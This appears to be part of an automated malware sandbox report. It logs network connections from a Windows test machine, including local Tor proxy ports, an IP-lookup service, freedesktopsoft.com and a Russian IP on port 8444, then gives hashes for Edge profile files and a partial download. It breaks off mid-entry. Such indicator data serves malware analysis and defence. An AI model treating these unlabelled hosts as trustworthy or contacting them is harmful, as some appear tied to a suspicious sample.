GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
FR 51.77.7.204:443 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
FR 51.77.7.204:443 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
US 8.8.8.8:53 feedback.smartscreen.microsoft.com udp
US 23.96.1.109:443 feedback.smartscreen.microsoft.com tcp
US 23.96.1.109:443 feedback.smartscreen.microsoft.com tcp
US 8.8.8.8:53 109.1.96.23.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 securityintelligencecenter-eastus.azurewebsites.net udp
US 8.8.8.8:53 assets.onestore.ms udp
US 8.8.8.8:53 mem.gfx.ms udp
US 23.192.22.93:443 www.microsoft.com tcp
US 23.192.22.93:443 www.microsoft.com tcp
US 13.107.246.65:443 mem.gfx.ms tcp
US 13.107.246.65:443 mem.gfx.ms tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
GB 184.87.176.59:443 assets.onestore.ms tcp
GB 184.87.176.59:443 assets.onestore.ms tcp
GB 184.87.176.59:443 assets.onestore.ms tcp
US 8.8.8.8:53 93.22.192.23.in-addr.arpa udp
US 8.8.8.8:53 65.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 59.176.87.184.in-addr.arpa udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 23.192.22.93:443 www.microsoft.com tcp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 8.8.8.8:53 dc.services.visualstudio.com udp
IE 20.166.40.71:443 dc.services.visualstudio.com tcp
US 8.8.8.8:53 71.40.166.20.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
US 38.68.50.179:443 tcp
N/A 127.0.0.1:9150 tcp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
CA 51.222.39.81:443 tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.11.108.188:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 188.108.11.51.in-addr.arpa udp
N/A 127.0.0.1:52850 tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
N/A 127.0.0.1:52859 tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 115.230.163.35.in-addr.arpa udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.11.108.188:443 nav.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav.smartscreen.microsoft.com tcp
GB 92.123.128.144:443 www.bing.com tcp
US 8.8.8.8:53 144.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
DE 23.55.161.185:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 142.250.200.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ned.gvt1.com udp
GB 173.194.183.71:443 r2---sn-aigl6ned.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ned.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ned.gvt1.com udp
GB 173.194.183.71:443 r2.sn-aigl6ned.gvt1.com udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 71.183.194.173.in-addr.arpa udp
US 8.8.8.8:53 185.161.55.23.in-addr.arpa udp
US 8.8.8.8:53 www.babylon-software.com udp
US 174.138.88.129:443 www.babylon-software.com tcp
US 174.138.88.129:443 www.babylon-software.com tcp
US 8.8.8.8:53 129.88.138.174.in-addr.arpa udp
US 8.8.8.8:53 edge.marker.io udp
US 104.26.14.104:443 edge.marker.io tcp
US 8.8.8.8:53 s.w.org udp
US 192.0.77.48:443 s.w.org tcp
US 192.0.77.48:443 s.w.org tcp
US 192.0.77.48:443 s.w.org tcp
US 192.0.77.48:443 s.w.org tcp
US 192.0.77.48:443 s.w.org tcp
US 192.0.77.48:443 s.w.org tcp
US 104.26.14.104:443 edge.marker.io udp
US 192.0.77.48:443 s.w.org udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 200.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.14.26.104.in-addr.arpa udp
US 8.8.8.8:53 48.77.0.192.in-addr.arpa udp
US 8.8.8.8:53 api.marker.io udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 172.67.70.243:443 api.marker.io tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 243.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 174.138.88.129:443 www.babylon-software.com tcp
US 216.239.32.36:443 region1.google-analytics.com udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 feedback.smartscreen.microsoft.com udp
US 8.8.8.8:53 mem.gfx.ms udp
US 8.8.8.8:53 www.microsoft.com udp
US 23.96.1.109:443 feedback.smartscreen.microsoft.com tcp
US 23.96.1.109:443 feedback.smartscreen.microsoft.com tcp
US 13.107.246.65:443 mem.gfx.ms tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 assets.onestore.ms udp
US 23.192.22.93:443 www.microsoft.com tcp
US 8.8.8.8:53 securityintelligencecenter-eastus.azurewebsites.net udp
US 13.107.246.65:443 wcpstatic.microsoft.com tcp
CH 2.16.12.143:443 assets.onestore.ms tcp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
US 8.8.8.8:53 143.12.16.2.in-addr.arpa udp
NL 194.109.206.212:443 tcp
N/A 127.0.0.1:64743 tcp
N/A 127.0.0.1:64764 tcp
GB 20.26.156.215:443 github.com tcp
SE 171.25.193.9:80 tcp
US 8.8.8.8:53 9.193.25.171.in-addr.arpa udp
US 23.96.1.109:443 securityintelligencecenter-eastus.azurewebsites.net tcp
CH 2.16.12.143:443 assets.onestore.ms tcp
US 8.8.8.8:53 dc.services.visualstudio.com udp
IE 20.50.65.88:443 dc.services.visualstudio.com tcp
US 8.8.8.8:53 88.65.50.20.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
GB 20.26.156.210:443 api.github.com tcp
FR 51.178.195.151:443 tcp
FR 51.77.7.204:443 tcp
US 149.255.35.125:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 freedesktopsoft.com udp
DE 78.46.117.95:80 freedesktopsoft.com tcp
DE 78.46.117.95:80 freedesktopsoft.com tcp
DE 78.46.117.95:80 freedesktopsoft.com tcp
DE 78.46.117.95:80 freedesktopsoft.com tcp
DE 78.46.117.95:80 freedesktopsoft.com tcp
DE 78.46.117.95:80 freedesktopsoft.com tcp
US 216.239.38.178:80 www.google-analytics.com tcp
US 8.8.8.8:53 connect.facebook.net udp
GB 163.70.151.21:80 connect.facebook.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 95.117.46.78.in-addr.arpa udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
GB 163.70.151.21:443 connect.facebook.net tcp
GB 163.70.151.21:443 connect.facebook.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.178.14:443 fundingchoicesmessages.google.com tcp
GB 142.250.178.14:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 2.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 178.38.239.216.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
GB 142.250.200.35:80 fonts.gstatic.com tcp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
GB 163.70.147.35:443 www.facebook.com udp
US 8.8.8.8:53 bot.whatismyipaddress.com udp
US 8.8.8.8:53 www.veryicon.com udp
GB 142.250.178.10:80 fonts.googleapis.com tcp
GB 142.250.178.10:80 fonts.googleapis.com tcp
US 104.21.11.28:80 www.veryicon.com tcp
US 104.21.11.28:80 www.veryicon.com tcp
US 104.21.11.28:443 www.veryicon.com tcp
US 104.21.11.28:443 www.veryicon.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 28.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:80 i.imgur.com tcp
US 199.232.196.193:80 i.imgur.com tcp
GB 142.250.200.35:80 fonts.gstatic.com tcp
GB 142.250.200.35:80 fonts.gstatic.com tcp
US 199.232.196.193:443 i.imgur.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 193.196.232.199.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
FR 51.77.7.204:443 tcp
US 38.68.50.179:443 tcp
RU 95.165.168.168:8444 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f6126b3cef466f7479c4f176528a9348
SHA1 87855913d0bfe2c4559dd3acb243d05c6d7e4908
SHA256 588138bf57e937e1dec203a5073c3edb1e921c066779e893342e79e3d160e0b4
SHA512 ef622b26c8cee1f767def355b2d7bffb2b28e7a653c09b7e2d33f6468a453fff39fd120cacbffd79ce35722592af0f3fb7d5054e2dca06310e44dc460533f3d8

\??\pipe\LOCAL\crashpad_1776_VFIRATPGKMGGNZAF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\17bb7c8e-4fc5-41bc-b43a-bca7c6013aa6.tmp

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dda6e078b56bc17505e368f3e845302
SHA1 45fbd981fbbd4f961bf72f0ac76308fc18306cba
SHA256 591bf3493eb620a3851c0cd65bff79758a09c61e9a22ea113fa0480404a38b15
SHA512 9e460013fd043cee9bdbcdaf96ac2f7e21a08e88ddb754dddbd8378ee2288d50271e66b42092d84a12e726469465185be11a6fafab6ed4236a244524bd60f502

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4dda9836-8665-4654-9885-22328a2e21b8.tmp

MD5 929773b114a0349ba22981f43427934c
SHA1 cc2610b23f0fa2d35913e980a3550cb45b1be541
SHA256 09f73affa3aedcb34bc69673d7a1a73909ab6cc990d7cd90f2fe88a8d4c81a4e
SHA512 ac7eff9155811b83966ea957f86e11d9b3ca24744eeae2e66d4b5ec39b90990a10e5bb39005141a09128b21fda333f18d68a1ff36b8f2b7cdbf431b1e5ec59fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 90cc75707c7f427e9bbc8e0553500b46
SHA1 9034bdd7e7259406811ec8b5b7ce77317b6a2b7e
SHA256 f5d76f8630779de1fe82f8802d6d144861e3487171e4b32e3f8fffd2a57725fb
SHA512 7ad692bce11aee08bf65bb7c578b89a4a3024211ee1deaf671c925d65cc016943f2caad3d57b365e16d1764c78c36cae35c3c45cef0928dd611a565b0313e511

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b3ce3ec7eb3f0129fed145dad4440549
SHA1 278c6e2caa592f5a2884623ab993bd2c3629a2b7
SHA256 26c19a6154bf1a157ea1d1e68b9afdfdabc0c4d6eb1517c0950cd0e7b079a5c7
SHA512 36175f20ebf65ef723b75ae5a760203d23dc259bfb85168ed9f2f93a1096f5c3d152a20dfb0cb536ac107e604af3d0a524a86709e7f5aac3c50943a422c1e6cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e30122d11fc8aa924073cf991d564040
SHA1 355b774df9ded1b335e5536ab91439ee1d41ef52
SHA256 a443c76f40e8dc9ea4e891808c65595fa6b7f59fbb220f84620d1469abd74593
SHA512 0f23a91f650493659a658d30c3c9163d088f5c137d8e1582f70a87e4af1470a8e1517c4e2972502b10c7c1a3ffa05a97ceccbf413eda57dbb66aa2f3867c652e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 0d8c8c98295f59eade1d8c5b0527a5c2
SHA1 038269c6a2c432c6ecb5b236d08804502e29cde0
SHA256 9148e2a2ba2a3b765c088dc8a1bdcc9b07b129e5e48729a61ebc321cb7b8b721
SHA512 885a734a97a6f8c4a8fb5f0efa9fe55742f0685210472ed376466e67f928e82ddf91ba1211389d9c55dd1e03dc064aa7a81d1fca3cf429fbaf8f60db8b1348c6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 3150a7837d721d66e25814559d08c08b
SHA1 0d4af82f3edb5eae845295a4ccdd8e82ea373fb4
SHA256 f1256c6a52bf622df5829e635ec8e671d1a9ae0a4c7ac0a86c62a2aea067ee65
SHA512 85a81ca7af39b18868dc46a129eb06618a5dfb9db6242381ff2fe69db22c39d48db1d6dce3e8b63d5cfec781a22ec50046e47a861feae08a9a25d27252e54c37

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 6cc1c2683d5ed763eb1bc834268f6e05
SHA1 bf526a3b653d8248a3608df8b3172d9b18321bf2
SHA256 1916ef123a6ce8c07e340bdd210bb63a45e661d9d6a8516cc68b85f9eebbded6
SHA512 2223229b9d757077d8dbbac41ac3551dd4508d3ab0c2a51f62d91c9ecbb0df14a0c7dc5e0e257b58959a4f760cda8620f0f30b167796aa0351ed416f13c13bb6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b66c4fd363a66b34b3f148b070c7c249
SHA1 f6a320ee8f21914ab2d9cbfe5d7e6fc04c3de1ea
SHA256 455e1410598662445f3c61f678116ad812b295c082b3b61815d5c461815b991f
SHA512 6dae69831c0f6bb3d79205999a71cd76beb67fc07c4b7b5b3c9e3be7453aa974d27aa2c9d502f913d88ca41f717cbb164bc7446c2f431e1ee8cec92809fdb1d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f2d9e342a4d1919d10309ad18889bc5b
SHA1 c97034991f5f98656c583c34a73b49e5565e761c
SHA256 f976084df6e45e84b7a6755b0096ebc10b4cedb0ab18c0fdeea2c55519e6999a
SHA512 31d1f2ac60f0d0c33b717a7f03152ce38ccec5a2b4e8f327ac166f946053bb1c64516a13f50895ba6753fd995020504fccc8397a0d2eccdc42734750db80c289

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d002.TMP

MD5 0385f658c3d22a2b632a18a4a192fba5
SHA1 9c2e5c1a1f26c22483f09c2ee88a547c3b39ea49
SHA256 693865b37784f7e908f91cd1430c0f5210227b800f873062fcf8dc75e59a92ab
SHA512 e7408444138e76c1fdfb95dfab456b8089c31e7a42f968982b2b3fde4deafa3e1b1f2fb1c098cccd5cdf9ac19e621bbffe780b154f878e4e20399fefc8ac71fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 4e786ef6de6d058a7ee21d714b5878f8
SHA1 a25cf3a4ef2c4208064a295fc00bf84be1557e8d
SHA256 fd7a0097dcdb4360e99e3131665aaf1cdddb65f638323d8dcd86832ac1c65b57
SHA512 79f32a2fe5204c324bcdfd5b11b3d7423cb8961e61350ef8b1a40390212bb1f2125be11aa9a8761edb2fd4c760a39c9f18394a8bd8bc55148ff2937b4ea67bac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 084a7c45c750134bc52120929e4adfa2
SHA1 7caa207a66cb97095da77cb26bc03c05e3e3e3ef
SHA256 d897e13540624694573d596496a442f317069973a8bd8f9464b2ee91406fb990
SHA512 6aac3796f0435096a86e81ef9bdcd0186ecf74d35a38dbcd9d5c08662fe707c50d015453bf7eef1cbdbade8fca2779aded56bf3a2407a5ae97fb2a6eb1092f2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 908677684413f5278249c1b08127d6a0
SHA1 df54a142c7eb47537509a54a8519f1c6c82d0965
SHA256 49910739da15aef97cf1b1fab8a1c6817991542d296c3fe6619248258626330b
SHA512 d6458614c8cf209da33129d5672f4eee9923bb56e91692c87a0f82a0e00c0ed0c03bad913e3ebfae7dab32f76465e58289e15e579bc5f8af37845ab250301773

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

MD5 46c65c348f90aa174bfc5f9dbacbc3a1
SHA1 f3f1cb408e89e48b14532730632dba27858d2676
SHA256 0b36587fac66193c3e84fc32c4edfecf3b9a8717aafea51178f5480239bfa008
SHA512 e18be3c74e039ff4297313b12abae8719e26eb852724a46f119121d008a7165e249bc17d17b3275a108e6de14b1bc443a7827589bc4fd46d616de699b8294ada

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d37b536a1bb5b0a520b436225f2c3a26
SHA1 c67e6e34470f4392001209f84a70bbd485040f5e
SHA256 efc7a462836f495670945ccbf66d966ce2df8c07fe6c90d73dba285d28ff4244
SHA512 928ad090433814a18bb7881e2bb8856c8be778c2014c05413c29845794c0fec218e997f8a176a4e82f0819a911cf06bb847622c60cbd27bd690f6e2e1d80352e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 32436b16192fc47446a404eec2219700
SHA1 e1f646ce9a44efcbcd232889277d0186b6485a22
SHA256 1eab63d2fdca86de62bccff3a564db33205cfe03083b7f87cef55a33268a3417
SHA512 08541deed52d18a22184b3ef2052ab3359633c16b9e7e88783540b1d5ececd8e6cd3dc1ba148a21584e11109118a7c5376e224720c8e20af6decabc051170ddf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 3bd4b0da0ca69ca8d0bc5e6b5838c087
SHA1 7bc95d7859f0b9ed17de99142c36c3bf533e4fe4
SHA256 4ebf8acb6eb1f47bf3b9960fc1abefbcdb5a956e200c7f188b9e394494e2383b
SHA512 5c13ba95854aef7fccf463bc4add4a19e40da44e202ef0cc5a72200cd65a5c2013beb0c6f19156f5b0c16cfa96fa67515e8ea39a65f00d9496f1abe8d773a0aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f52864a0854becdb7813e8b5a9b1a7ef
SHA1 4091fc499c804b64b442d1c3452b9030f90ee7a9
SHA256 eea35ed36c203069a07bf9b9d3b29b9748f9e067beabb217a57f2679755f1c31
SHA512 4ba6c1e8b21cbd169bd976fc2a5df74f55f14e1b535669206ac2e08dc55071d2dcaeb996f706d5fb4fed4b8d955450c2db95beaa759afbaca538e82d85812e79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 07d4df7ef9937fb8cf1b8fd463354950
SHA1 3e470edb38edde953b427d17412101c26ab22497
SHA256 566ccc0b971928be67e53e7545fea9f60ef8602edb719dc0b35c3871b3d78112
SHA512 e98d09db4a87d2ca56ad95b3df0a25eef8e2ff7810514e3fd84d9ba5684ae1a0430b24fc7d454347994053273b12f738ad2aed5f257ba347ae8fa7dc70ce7359

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5d7fc53ac19c946ce921e23ca8d03ead
SHA1 2eb098b1bb53851c720227d43ea84230ebefa905
SHA256 eb86571243b3ddbd9a9783c927e525b33f572ce7b3d4e8a8cbe4ad5199757b23
SHA512 9ab6d9794246e68da833ffb5601bd792882b010a53aeb8a9e251078ab388f0e9c020f9ef50c1313e24da9c15368aae54e58d87c639c6484a7d1dcc5b1e69522b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 818f039d5ded532eae86d12ae2a41d28
SHA1 14472d083e9bd060509cbd48c4952412ca330df7
SHA256 9684ebcb31a732d49004c79e91f02f4698f4db6e0b83448d1e33a865d6b3d73a
SHA512 c59c024b86a01f2f5af12c54a05e333df482f1416f31ecf6f75f4e0c0efbddee00cdd0f63c944f81ad8ffce5cc98728e936745b90280a5daff1761943d16677d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe588ff6.TMP

MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 95d72e5a735d2124832ae4be2981bb87
SHA1 ad77730b2f3e7fa62b9468d2200f97e43da0bfaf
SHA256 262738eb6b611f88b7d9f4a45a6343623d19e16aaae0c39fdde4fff5d79615a5
SHA512 ccd85871829fe2ce38f0806e08325d6e11028a4dc0e97aa9aa048522d3f7ec8f1f1cec9487d3439385a204e0776d13e25f66a56eadd38cc690919f324c0c5e9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 86bd07fc23df63032eae2b71fcd4d953
SHA1 c03c4239b201e51e480ebf88c2f7d819f8165d00
SHA256 85147518b553f8a19ae4f20123e23ceecafaca3a569f442cd9aa67830d3e8245
SHA512 bee47ffba3c3707cf429355cdfa897ead768b3930ae71417b01babdc59b0e0aa61ff69febce92b9839c8a13b2e2d579a456b5d029eea7df16a0df22175f38116

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 af5870365ed0dd3ec2ce0d5beff19515
SHA1 14229509e90416408d1b868ab8abfec968b21f4c
SHA256 c87aa9c9818d4205895ab9e429dca1fa66ea01d68bea439763e490a96a98f603
SHA512 c38864e31768bd37042118ede37231bd6a15033b4b7805bd26d3743ceb52cc9395b1f4cef27dfea73f6bccfe54f698cc6f03cfbc7771fa0241bc23378072fdd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 69777d6eca3c12f730e9398838f4f16e
SHA1 7a6184992e7752bb6df54d40ccc3ca9da94081ba
SHA256 8c220446d362ff021db2d7232c96d8c7ca7bc0d992fb4f06bca9f43a9b27807f
SHA512 282601d6364d61d1fc7f2fa50a998e32f222e58be0840e82a3c338ef8f89bc518b424a69c9a7a76176345d8f9ca9adeac5697a6c98523d4bc744276418ff21a2

C:\Users\Admin\Downloads\Unconfirmed 513577.crdownload

MD5 48d8f7bbb500af66baa765279ce58045
SHA1 2cdb5fdeee4e9c7bd2e5f744150521963487eb71
SHA256 db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1
SHA512 aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0003eb078ee8ef89abe0ccdfec12f97b
